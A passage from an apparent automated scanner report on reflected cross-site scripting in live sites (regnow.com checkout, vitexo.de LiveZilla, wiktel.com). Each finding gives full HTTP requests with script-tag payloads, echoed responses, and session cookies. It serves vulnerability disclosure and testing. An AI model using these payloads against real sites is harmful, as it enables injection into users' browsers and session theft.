This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_addr.email=&bill_addr_confirm_email=&bill_addr.fname=&bill_addr.lname=&bill_addr.company=&bill_addr.phone=&bill_addr.add1=&bill_addr.add2=&bill_addr.city=&bill_addr.state=f7cf3<script>alert(1)</script>6fda55ceb90&bill_addr.zip=&bill_addr.country=US&vat_number=&use_bill_as_ship_addr=1&opt_in_present=&opt_in=1&ship_addr.fname=&ship_addr.lname=&ship_addr.company=&ship_addr.phone=&ship_addr.email=&ship_addr_confi
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:48:16 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 14:48:19 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 14:48:19 GMT
Content-Length: 75540
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'f7cf3<script>alert(1)</script>6fda55ceb90' is not a valid value</li>
...[SNIP]...

3.170. https://www.regnow.com/checkout/cart/edit [cc_exp_month parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the cc_exp_month request parameter is copied into the HTML document as plain text between tags. The payload e869c<script>alert(1)</script>25983be44dc was submitted in the cc_exp_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
ddr_confirm_email=&ship_addr.add1=&ship_addr.add2=&ship_addr.city=&ship_addr.state=&ship_addr.zip=&ship_addr.country=US&gift_note=&payment_type_def_id=CC&cc_name=&cc_type=VSA&cc_number=&cc_exp_month=1e869c<script>alert(1)</script>25983be44dc&cc_exp_year=2011&cc_cvv=&SUBMIT_ORDER=Place+Secure+Order

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:31:10 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 15:31:12 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 15:31:12 GMT
Content-Length: 75539
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'1e869c<script>alert(1)</script>25983be44dc' is not a valid value</li>
...[SNIP]...

3.171. https://www.regnow.com/checkout/cart/edit [cc_exp_year parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the cc_exp_year request parameter is copied into the HTML document as plain text between tags. The payload e8f2d<script>alert(1)</script>db93a5dd3be was submitted in the cc_exp_year parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
=&ship_addr.add1=&ship_addr.add2=&ship_addr.city=&ship_addr.state=&ship_addr.zip=&ship_addr.country=US&gift_note=&payment_type_def_id=CC&cc_name=&cc_type=VSA&cc_number=&cc_exp_month=1&cc_exp_year=2011e8f2d<script>alert(1)</script>db93a5dd3be&cc_cvv=&SUBMIT_ORDER=Place+Secure+Order

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:33:12 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 15:33:14 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 15:33:14 GMT
Content-Length: 75544
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'2011e8f2d<script>alert(1)</script>db93a5dd3be' is not a valid value</li>
...[SNIP]...

3.172. https://www.regnow.com/checkout/cart/edit [payment_type_def_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the payment_type_def_id request parameter is copied into the HTML document as plain text between tags. The payload 16ef6<script>alert(1)</script>72ff08b81c5 was submitted in the payment_type_def_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
mpany=&ship_addr.phone=&ship_addr.email=&ship_addr_confirm_email=&ship_addr.add1=&ship_addr.add2=&ship_addr.city=&ship_addr.state=&ship_addr.zip=&ship_addr.country=US&gift_note=&payment_type_def_id=CC16ef6<script>alert(1)</script>72ff08b81c5&cc_name=&cc_type=VSA&cc_number=&cc_exp_month=1&cc_exp_year=2011&cc_cvv=&SUBMIT_ORDER=Place+Secure+Order

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:24:36 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 15:24:39 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 15:24:39 GMT
Content-Length: 74872
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'CC16ef6<script>alert(1)</script>72ff08b81c5' is not a valid value</li>
...[SNIP]...

3.173. https://www.regnow.com/checkout/cart/edit [ship_addr.country parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the ship_addr.country request parameter is copied into the HTML document as plain text between tags. The payload 3889e<script>alert(1)</script>733a0108356 was submitted in the ship_addr.country parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
ame=&ship_addr.lname=&ship_addr.company=&ship_addr.phone=&ship_addr.email=&ship_addr_confirm_email=&ship_addr.add1=&ship_addr.add2=&ship_addr.city=&ship_addr.state=&ship_addr.zip=&ship_addr.country=US3889e<script>alert(1)</script>733a0108356&gift_note=&payment_type_def_id=CC&cc_name=&cc_type=VSA&cc_number=&cc_exp_month=1&cc_exp_year=2011&cc_cvv=&SUBMIT_ORDER=Place+Secure+Order

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:21:08 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 15:21:10 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 15:21:10 GMT
Content-Length: 75554
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'US3889e<script>alert(1)</script>733a0108356' is not a valid value</li>
...[SNIP]...

3.174. https://www.regnow.com/checkout/cart/edit [ship_addr.state parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.regnow.com
Path:   /checkout/cart/edit

Issue detail

The value of the ship_addr.state request parameter is copied into the HTML document as plain text between tags. The payload 6705d<script>alert(1)</script>b68c7b1b8a8 was submitted in the ship_addr.state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /checkout/cart/edit HTTP/1.1
Host: www.regnow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regnow.com/checkout/cart/view
Cookie: uid=38WZRCH-CYS8K; visitor=1117580992; regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; BIGipServerp-regnow-pod4-active=184680714.24606.0000
Content-Type: application/x-www-form-urlencoded
Content-Length: 818

currency_select=USD&set_locale=en_US&user_prefs=&ORDERID=38WZRCH-H74YE&ORDER_PROCESS_PAGE=ORDER_FORM&UPDATE_CART=0&IS_GIFT=&HAS_CD=0&QUICKBUY=&SUBMIT_BUTTON_CLICKED=1&ACCEPT_CD2GO=&coupon_code=&bill_a
...[SNIP]...
pt_in_present=&opt_in=1&ship_addr.fname=&ship_addr.lname=&ship_addr.company=&ship_addr.phone=&ship_addr.email=&ship_addr_confirm_email=&ship_addr.add1=&ship_addr.add2=&ship_addr.city=&ship_addr.state=6705d<script>alert(1)</script>b68c7b1b8a8&ship_addr.zip=&ship_addr.country=US&gift_note=&payment_type_def_id=CC&cc_name=&cc_type=VSA&cc_number=&cc_exp_month=1&cc_exp_year=2011&cc_cvv=&SUBMIT_ORDER=Place+Secure+Order

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:17:48 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.12.2
Set-Cookie: uid=38WZRCH-CYS8K; path=/
Set-Cookie: visitor=1117580992; path=/; expires=Sat, 13-Aug-2011 15:17:50 GMT
Set-Cookie: regnow_checkout_session=aa4736fe44a4f30c36a9b18ae2931c5ca2d5cff8; path=/; secure; HttpOnly
Set-Cookie: locale=en_US; path=/; expires=Fri, 13-May-2016 15:17:50 GMT
Content-Length: 75572
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: regnow02@dc1regnow01.regnow.digitalriver.com
X-Cnection: close
Content-Type: text/html; charset=utf-8

<HTML>
<HEAD>
<TITLE></TITLE>
<STYLE>
body{
font-family: 'Arial', sans-serif;
margin: 0;
padding: 0;
background: url(//regnow.img.digitalriver.com/vendor/13799/body_bg.jpg) repeat-x 0 0 #fff;
...[SNIP]...
<li style="color:red; font-weight:bold;">'6705d<script>alert(1)</script>b68c7b1b8a8' is not a valid value</li>
...[SNIP]...

3.175. http://www.vitexo.de/support/server.php [browid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vitexo.de
Path:   /support/server.php

Issue detail

The value of the browid request parameter is copied into the HTML document as plain text between tags. The payload 1e7bc<script>alert(1)</script>0d6eddfe6a6 was submitted in the browid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/server.php?request=track&start=1305467989559&browid=aed7c271e7bc<script>alert(1)</script>0d6eddfe6a6&url=aHR0cDovL3d3dy52aXRleG8uZGUv&livezilla=381c574&cd=32&rh=1200&rw=1920&rf=aHR0cDovL3Nob3BzLm9zY29tbWVyY2UuY29tL2RpcmVjdG9yeS9nb3RvLDQzNjg3&tzo=-5&code=&en=&ee=&ec=&geo_lat=LTUyMg==&geo_long=LTUyMg==&geo_region=&geo_city=&geo_tz=&geo_ctryiso=&geo_rid=4&geo_ss=60 HTTP/1.1
Host: www.vitexo.de
Proxy-Connection: keep-alive
Referer: http://www.vitexo.de/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: livezilla=YToxOntzOjY6InVzZXJpZCI7czo3OiIzODFjNTc0Ijt9; LOOP_Shop=ad6a5fe7d29f4a372a1cc4c3e53b41b2; __utmz=209196309.1305467958.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,43687; __utma=209196309.299123066.1305467958.1305467958.1305467958.1; __utmc=209196309; __utmb=209196309.1.10.1305467958

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:05:26 GMT
Server: Apache/2.0.59easyTECC/2.0 (Unix) PHP/5.2.1 mod_ssl/2.0.59easyTECC/2.0 OpenSSL/0.9.8e mod_perl/2.0.3 Perl/v5.8.5
X-Powered-By: PHP/5.2.1
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: livezilla=YToyOntzOjY6InVzZXJpZCI7czo3OiIzODFjNTc0IjtzOjY6InZpc2l0cyI7aToxO30%3D; expires=Wed, 27-Jul-2011 14:05:26 GMT
Expires: Sun, 15 May 2011 14:05:26 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 126

lz_tracking_set_sessid("381c574","aed7c271e7bc<script>alert(1)</script>0d6eddfe6a6");lz_tracking_callback(30,'1305467989559');

3.176. http://www.vitexo.de/support/server.php [livezilla parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vitexo.de
Path:   /support/server.php

Issue detail

The value of the livezilla request parameter is copied into the HTML document as plain text between tags. The payload ae77c<script>alert(1)</script>4c049e29410 was submitted in the livezilla parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/server.php?request=track&start=1305467989559&browid=aed7c27&url=aHR0cDovL3d3dy52aXRleG8uZGUv&livezilla=381c574ae77c<script>alert(1)</script>4c049e29410&cd=32&rh=1200&rw=1920&rf=aHR0cDovL3Nob3BzLm9zY29tbWVyY2UuY29tL2RpcmVjdG9yeS9nb3RvLDQzNjg3&tzo=-5&code=&en=&ee=&ec=&geo_lat=LTUyMg==&geo_long=LTUyMg==&geo_region=&geo_city=&geo_tz=&geo_ctryiso=&geo_rid=4&geo_ss=60 HTTP/1.1
Host: www.vitexo.de
Proxy-Connection: keep-alive
Referer: http://www.vitexo.de/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: livezilla=YToxOntzOjY6InVzZXJpZCI7czo3OiIzODFjNTc0Ijt9; LOOP_Shop=ad6a5fe7d29f4a372a1cc4c3e53b41b2; __utmz=209196309.1305467958.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,43687; __utma=209196309.299123066.1305467958.1305467958.1305467958.1; __utmc=209196309; __utmb=209196309.1.10.1305467958

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:05:41 GMT
Server: Apache/2.0.59easyTECC/2.0 (Unix) PHP/5.2.1 mod_ssl/2.0.59easyTECC/2.0 OpenSSL/0.9.8e mod_perl/2.0.3 Perl/v5.8.5
X-Powered-By: PHP/5.2.1
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: livezilla=YToxOntzOjY6InVzZXJpZCI7czo0ODoiMzgxYzU3NGFlNzdjPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjRjMDQ5ZTI5NDEwIjt9; expires=Wed, 27-Jul-2011 14:05:41 GMT
Set-Cookie: livezilla=YToyOntzOjY6InVzZXJpZCI7czo0ODoiMzgxYzU3NGFlNzdjPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjRjMDQ5ZTI5NDEwIjtzOjY6InZpc2l0cyI7aToxO30%3D; expires=Wed, 27-Jul-2011 14:05:41 GMT
Expires: Sun, 15 May 2011 14:05:41 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 126

lz_tracking_set_sessid("381c574ae77c<script>alert(1)</script>4c049e29410","aed7c27");lz_tracking_callback(30,'1305467989559');

3.177. http://www.vitexo.de/support/server.php [start parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vitexo.de
Path:   /support/server.php

Issue detail

The value of the start request parameter is copied into the HTML document as plain text between tags. The payload f6044<script>alert(1)</script>ca9b4d96ff2 was submitted in the start parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/server.php?request=track&start=1305467989559f6044<script>alert(1)</script>ca9b4d96ff2&browid=aed7c27&url=aHR0cDovL3d3dy52aXRleG8uZGUv&livezilla=381c574&cd=32&rh=1200&rw=1920&rf=aHR0cDovL3Nob3BzLm9zY29tbWVyY2UuY29tL2RpcmVjdG9yeS9nb3RvLDQzNjg3&tzo=-5&code=&en=&ee=&ec=&geo_lat=LTUyMg==&geo_long=LTUyMg==&geo_region=&geo_city=&geo_tz=&geo_ctryiso=&geo_rid=4&geo_ss=60 HTTP/1.1
Host: www.vitexo.de
Proxy-Connection: keep-alive
Referer: http://www.vitexo.de/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: livezilla=YToxOntzOjY6InVzZXJpZCI7czo3OiIzODFjNTc0Ijt9; LOOP_Shop=ad6a5fe7d29f4a372a1cc4c3e53b41b2; __utmz=209196309.1305467958.1.1.utmcsr=shops.oscommerce.com|utmccn=(referral)|utmcmd=referral|utmcct=/directory/goto,43687; __utma=209196309.299123066.1305467958.1305467958.1305467958.1; __utmc=209196309; __utmb=209196309.1.10.1305467958

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:05:18 GMT
Server: Apache/2.0.59easyTECC/2.0 (Unix) PHP/5.2.1 mod_ssl/2.0.59easyTECC/2.0 OpenSSL/0.9.8e mod_perl/2.0.3 Perl/v5.8.5
X-Powered-By: PHP/5.2.1
Connection: close
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: livezilla=YToyOntzOjY6InVzZXJpZCI7czo3OiIzODFjNTc0IjtzOjY6InZpc2l0cyI7aToxO30%3D; expires=Wed, 27-Jul-2011 14:05:18 GMT
Expires: Sun, 15 May 2011 14:05:18 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 126

lz_tracking_set_sessid("381c574","aed7c27");lz_tracking_callback(30,'1305467989559f6044<script>alert(1)</script>ca9b4d96ff2');

3.178. http://www.wiktel.com/events.php [bgColor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiktel.com
Path:   /events.php

Issue detail

The value of the bgColor request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2298b'><script>alert(1)</script>7b7bb0d95c7 was submitted in the bgColor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /events.php?bgColor=EEEDEA2298b'><script>alert(1)</script>7b7bb0d95c7& HTTP/1.1
Host: www.wiktel.com
Proxy-Connection: keep-alive
Referer: http://www.wiktel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 4556

<html><head>
<style type='text/css'>
a:link, a:visited {color: #0000FF; text-decoration: none;}
a:hover {color: #0000FF; text-decoration: underline;}
a:active {color: #0000FF; text-decoration: none;}

...[SNIP]...
<body bgcolor='EEEDEA2298b'><script>alert(1)</script>7b7bb0d95c7'>
...[SNIP]...

3.179. http://www.wiktel.com/events.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiktel.com
Path:   /events.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5a4a'><script>alert(1)</script>036c8c6f9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /events.php?bgColor=EEE/b5a4a'><script>alert(1)</script>036c8c6f9ecDEA& HTTP/1.1
Host: www.wiktel.com
Proxy-Connection: keep-alive
Referer: http://www.wiktel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:18:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 4558

<html><head>
<style type='text/css'>
